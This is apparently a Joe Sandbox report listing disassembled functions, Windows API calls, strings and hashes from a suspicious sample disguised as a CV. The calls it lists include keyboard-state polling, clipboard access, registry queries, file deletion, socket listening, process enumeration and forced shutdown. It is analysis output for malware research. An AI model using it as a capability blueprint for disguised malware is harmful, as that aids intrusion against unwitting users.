Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: b0ba6ccbc5856de0475797718556a596167d62a673a3952f38aef587a7eff979
Instruction ID: 417a23077f6cfb5fd4e28ab7dc7b4d5f99fa6c1c7714e858dca49ada03ed3094
Opcode Fuzzy Hash: b0ba6ccbc5856de0475797718556a596167d62a673a3952f38aef587a7eff979
Instruction Fuzzy Hash: E7515A71900619AFDF12DFA5EC44EEEBBB9FF04300F148129F915AB290DB349A46CB61

Function 002F6F07 Relevance: 20.9, Strings: 16, Instructions: 883COMMON

Download Yara Rule

Strings

NO_AUTO_POSSESS), xrefs: 00372CB0
UTF16), xrefs: 00372C56
BSR_ANYCRLF), xrefs: 00372EA0
UCP), xrefs: 00372C8F
CRLF), xrefs: 00372E43
NO_START_OPT), xrefs: 00372CD1
9, xrefs: 002F6F77
UTF), xrefs: 00372C7C
LF), xrefs: 00372E26
LIMIT_RECURSION=, xrefs: 00372D7E
ANY), xrefs: 00372E60
999 9, xrefs: 002F7096, 002F709C
ANYCRLF), xrefs: 00372E7D
BSR_UNICODE), xrefs: 00372EBA
LIMIT_MATCH=, xrefs: 00372CF2
CR), xrefs: 00372E09

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID:
String ID: 9$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$999 9
API String ID: 0-2693932307
Opcode ID: c5dd8aa22f0f07186ed1334047e331b920f1f7ee8f4f6d1c95423ca6be1ea938
Instruction ID: d5c2bb362768443ba2492a8f85b8f268994a0a97a2f18e757e7ea252f4148cba
Opcode Fuzzy Hash: c5dd8aa22f0f07186ed1334047e331b920f1f7ee8f4f6d1c95423ca6be1ea938
Instruction Fuzzy Hash: A4727E71E14219DBDB25CF58C8807BEB7B5FF48350F14816AE919EB280EB749E81DB90

Function 003363F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00336EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00335FA6,?), ref: 00336ED8

Part of subcall function 003372CB: GetFileAttributesW.KERNEL32(?,00336019), ref: 003372CC

_wcscat.LIBCMT ref: 00336441
__wsplitpath.LIBCMT ref: 0033645F
FindFirstFileW.KERNEL32(?,?), ref: 00336474
_wcscpy.LIBCMT ref: 003364A3
_wcscat.LIBCMT ref: 003364B8
_wcscat.LIBCMT ref: 003364CA
DeleteFileW.KERNEL32(?), ref: 003364DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 003364EB
FindClose.KERNEL32(00000000), ref: 00336506

Strings

\*.*, xrefs: 0033643B

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: ed58eabf96b828d7aff283bcea0f57afdac79a0b6f164dd4299f99b9d5b30f2f
Instruction ID: bfcd701f09e6fc4a72972a079f4d02f04ec2e6ea0af16c6681fc65037f8e3aa5
Opcode Fuzzy Hash: ed58eabf96b828d7aff283bcea0f57afdac79a0b6f164dd4299f99b9d5b30f2f
Instruction Fuzzy Hash: 3931B6B2408384AEC322DBA488859DBB7ECAF5A300F40492EF5D8C7141EA35D54D87A7

Function 003531BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00353C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00352BB5,?,?), ref: 00353C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0035328E

Part of subcall function 002F936C: __swprintf.LIBCMT ref: 002F93AB
Part of subcall function 002F936C: __itow.LIBCMT ref: 002F93DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0035332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003533C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00353604
RegCloseKey.ADVAPI32(00000000), ref: 00353611

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 61f15c3a551708ca32164f37b670073b60becacc04f766636d07fa98a5ce2d4e
Instruction ID: e274bc3d83e235dba771bb4a695e72f0ff17faa156c29b840408b05977b90843
Opcode Fuzzy Hash: 61f15c3a551708ca32164f37b670073b60becacc04f766636d07fa98a5ce2d4e
Instruction Fuzzy Hash: AEE16B75604204AFCB15DF29C995E2ABBE8FF89354F04886DF94ADB2A1DB30E905CF41

Function 00332B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00332B5F
GetAsyncKeyState.USER32(000000A0), ref: 00332BE0
GetKeyState.USER32(000000A0), ref: 00332BFB
GetAsyncKeyState.USER32(000000A1), ref: 00332C15
GetKeyState.USER32(000000A1), ref: 00332C2A
GetAsyncKeyState.USER32(00000011), ref: 00332C42
GetKeyState.USER32(00000011), ref: 00332C54
GetAsyncKeyState.USER32(00000012), ref: 00332C6C
GetKeyState.USER32(00000012), ref: 00332C7E
GetAsyncKeyState.USER32(0000005B), ref: 00332C96
GetKeyState.USER32(0000005B), ref: 00332CA8

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 152d23cb4ca7d7145eb41268105b1bbc25cbd7de0d6156361b91669c72f385f6
Instruction ID: eb95b8d9731f38be4084558cd70a9bf3cd5de8a3d07f4b3cbef4c2881c7491bd
Opcode Fuzzy Hash: 152d23cb4ca7d7145eb41268105b1bbc25cbd7de0d6156361b91669c72f385f6
Instruction Fuzzy Hash: 4541C8345047C96EFF379B6488843BBFFB06F12354F099059E9C6562C2DBA499C8C7A2

Function 00346D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00346D2E
EmptyClipboard.USER32 ref: 00346D34
GlobalAlloc.KERNEL32(00000002,?), ref: 00346D49
CloseClipboard.USER32 ref: 00346DE8

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: bccf92230938d9e8de9be9a02e7943ed8b7622505d61025c3268bb883950d817
Instruction ID: 4f210b37b12aa1fa175d3ed7c7d42a17f64c12f417693f648a9c70bbac733e11
Opcode Fuzzy Hash: bccf92230938d9e8de9be9a02e7943ed8b7622505d61025c3268bb883950d817
Instruction Fuzzy Hash: 10218B31700110AFDB22AF64DC5AB6E77E8EF45711F018419F90AAB2A1CB30E8818B51

Function 0034C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 00329ABF: CLSIDFromProgID.OLE32 ref: 00329ADC
Part of subcall function 00329ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00329AF7
Part of subcall function 00329ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00329B05
Part of subcall function 00329ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00329B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0034C235
_memset.LIBCMT ref: 0034C242
_memset.LIBCMT ref: 0034C360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0034C38C
CoTaskMemFree.OLE32(?), ref: 0034C397

Strings

NULL Pointer assignment, xrefs: 0034C3E5

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 56806da92379135bbeb8a1bd19d973489b117dc4c1176af283580dd3ca6b7858
Instruction ID: 4dfb9528db93a7500870dc1f8fd0afe2f0fe60bb9780d654ac843e9a174a1cb4
Opcode Fuzzy Hash: 56806da92379135bbeb8a1bd19d973489b117dc4c1176af283580dd3ca6b7858
Instruction Fuzzy Hash: 07917E71D11218ABDB12DF95DC55EEEFBB8EF08350F10812AF519AB281DB706A45CFA0

Function 003379D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 0032B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0032B180
Part of subcall function 0032B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0032B1AD
Part of subcall function 0032B134: GetLastError.KERNEL32 ref: 0032B1BA

ExitWindowsEx.USER32(?,00000000), ref: 00337A0F

Strings

SeShutdownPrivilege, xrefs: 003379DD
, xrefs: 003379FD
@, xrefs: 00337A02

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 9c2b32f8b6bfc50cae5196ead5cc2779a337f0b054ad6bf56622b7a6935288f6
Instruction ID: 7c37cea810119163fd17b5cd38c87fb2fb680aedb9c2c4803e8cd5af6f2eca92
Opcode Fuzzy Hash: 9c2b32f8b6bfc50cae5196ead5cc2779a337f0b054ad6bf56622b7a6935288f6
Instruction Fuzzy Hash: DF01A7F16582216BF73B56649CDBBBF736C9B00741F150924FD43A62D2E6619E4091B0

Function 00348C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00348CA8
WSAGetLastError.WSOCK32(00000000), ref: 00348CB7
bind.WSOCK32(00000000,?,00000010), ref: 00348CD3
listen.WSOCK32(00000000,00000005), ref: 00348CE2
WSAGetLastError.WSOCK32(00000000), ref: 00348CFC
closesocket.WSOCK32(00000000,00000000), ref: 00348D10

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: a02f1c8aedad028b495e24bc1dd977b7d2ed556faca2ac1ec369e15c84337a04
Instruction ID: 418c0e9a4d828ac4c2956398001bd11415f4279519fbbbb2937f35d75549f2a5
Opcode Fuzzy Hash: a02f1c8aedad028b495e24bc1dd977b7d2ed556faca2ac1ec369e15c84337a04
Instruction Fuzzy Hash: D621D3316002049FCB26EF68CD85B6EB7F9EF49710F158158F916AB3D2CB30AD818B51

Function 00336532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00336554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00336564
Process32NextW.KERNEL32(00000000,0000022C), ref: 00336583
__wsplitpath.LIBCMT ref: 003365A7
_wcscat.LIBCMT ref: 003365BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 003365F9

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 131d29bbe6b20935f0277c4cb89038850045240e508aa0128966bf4fe238f929
Instruction ID: dfc4bf16661aa49aa1c1b2543bf564ebbaf7b6364bcc56c01b17f0cb5e18a747
Opcode Fuzzy Hash: 131d29bbe6b20935f0277c4cb89038850045240e508aa0128966bf4fe238f929
Instruction Fuzzy Hash: 22214F71900219AFEB22ABA4DCC9BEEB7BCAB49300F5044A5E505E7141EB719B85CB60

Function 002F9B60 Relevance: 8.6, Strings: 6, Instructions: 1055COMMON

Download Yara Rule

Strings

VUUU, xrefs: 002F9ED4
9, xrefs: 002F9CF3
VUUU, xrefs: 0037BE14
VUUU, xrefs: 002F9EA7
ERCP, xrefs: 002F9C32
VUUU, xrefs: 002F9E95

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU$9
API String ID: 0-3235341201
Opcode ID: b328ead2763824fc05543e5ed0e966336af0bae39c674faf924b4cd91627fb1b
Instruction ID: 0324c098d1de2a8ba88a8e45e440790ef6c264eab1638d98e425a32c2114fa0e
Opcode Fuzzy Hash: b328ead2763824fc05543e5ed0e966336af0bae39c674faf924b4cd91627fb1b
Instruction Fuzzy Hash: 4C929C71A2021ACBDF35CF58C8807BDF3B1BB54354F2581AAE91AAB280D7749D91CF91

Function 003313CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 003313DC

Strings

|, xrefs: 0033140C
<2:, xrefs: 003316FA
(, xrefs: 00331422
,2:, xrefs: 003316B1

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: lstrlen
String ID: ($,2:$<2:$|
API String ID: 1659193697-2637774085
Opcode ID: 07fc532f5fd4252c4c793ccd48421234c8e150633848117d3c2e929761d849f8
Instruction ID: 5d6b49c7b644dc19675815262c283fb77713d98f426fc2c2f70080b19750c78b
Opcode Fuzzy Hash: 07fc532f5fd4252c4c793ccd48421234c8e150633848117d3c2e929761d849f8
Instruction Fuzzy Hash: 15321475A006059FC729CF69C480A6AB7F0FF48320F16C56EE59ADB7A1E770E981CB44

Function 0034923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0034A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0034A84E

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00349296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 003492B9

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: d50dace54065b7b551b21a66b4f0b817e89c3fbe6fb7250d15b66c6e54149090
Instruction ID: 8ecea7b48bee2466a5ac0796432d1fce739b7833bc0b9d4f0d9b68f00b1c96dd
Opcode Fuzzy Hash: d50dace54065b7b551b21a66b4f0b817e89c3fbe6fb7250d15b66c6e54149090
Instruction Fuzzy Hash: 0A41DE70600204AFEB16AF28C896E7FB7EDEF44324F044459F916AF2D2CB74AD418B91

Function 0033EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0033EB8A
_wcscmp.LIBCMT ref: 0033EBBA
_wcscmp.LIBCMT ref: 0033EBCF
FindNextFileW.KERNEL32(00000000,?), ref: 0033EBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0033EC0E

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 69f92bce840d09820da842ef75fa71c3f2af1e4567657f0017251c076f0c9f27
Instruction ID: 1425c2185c9b6d1ddf027fec90e7ac134e7d6b015a4de23a5c9db6578c5d19d4
Opcode Fuzzy Hash: 69f92bce840d09820da842ef75fa71c3f2af1e4567657f0017251c076f0c9f27
Instruction Fuzzy Hash: DD41AC356043028FC71ADF28C4D1EAAB3E8FF49324F10455DE95A8B3E1DB31A984CB91

Function 00358111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00358160
IsWindowEnabled.USER32 ref: 0035816E
GetForegroundWindow.USER32(?,?,00000001), ref: 0035817B
IsIconic.USER32 ref: 00358189
IsZoomed.USER32 ref: 00358197

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: d2d34a367de75c67a97fc6f3676aecc52c4e0140f9a35167586a04f2e193d5f7
Instruction ID: a7de14dc9fc856587f01a3bc89c56f02dbded21bb7d335071c90e40e8b2f37a0
Opcode Fuzzy Hash: d2d34a367de75c67a97fc6f3676aecc52c4e0140f9a35167586a04f2e193d5f7
Instruction Fuzzy Hash: D611B2313009156BE7235F26DC44E6FB7ADEF45762F050429FC49E72A1CF309A468BA0

Function 0030E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0030E014,74DF0AE0,0030DEF1,0038DC38,?,?), ref: 0030E02C
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0030E03E

Strings

GetNativeSystemInfo, xrefs: 0030E038
kernel32.dll, xrefs: 0030E027

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 7e8e82a268f1962ab892e0ab1a06e9b39755e3d25aab9a70e992ec30a9dc9e3e
Instruction ID: 251f8bfb4a74a396082889bd221f2feb2ddc3325fb5d96d65dfee05d261e088f
Opcode Fuzzy Hash: 7e8e82a268f1962ab892e0ab1a06e9b39755e3d25aab9a70e992ec30a9dc9e3e
Instruction Fuzzy Hash: 7CD0A7B15007129FC7334F65EC08A5377E8EF01310F19481AE887D2590D7B4C8C0C750

Function 0030B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON

Download Yara Rule

APIs

Part of subcall function 0030B34E: GetWindowLongW.USER32(?,000000EB), ref: 0030B35F

DefDlgProcW.USER32(?,?,?,?,?), ref: 0030B22F

Part of subcall function 0030B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0030B5A5

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

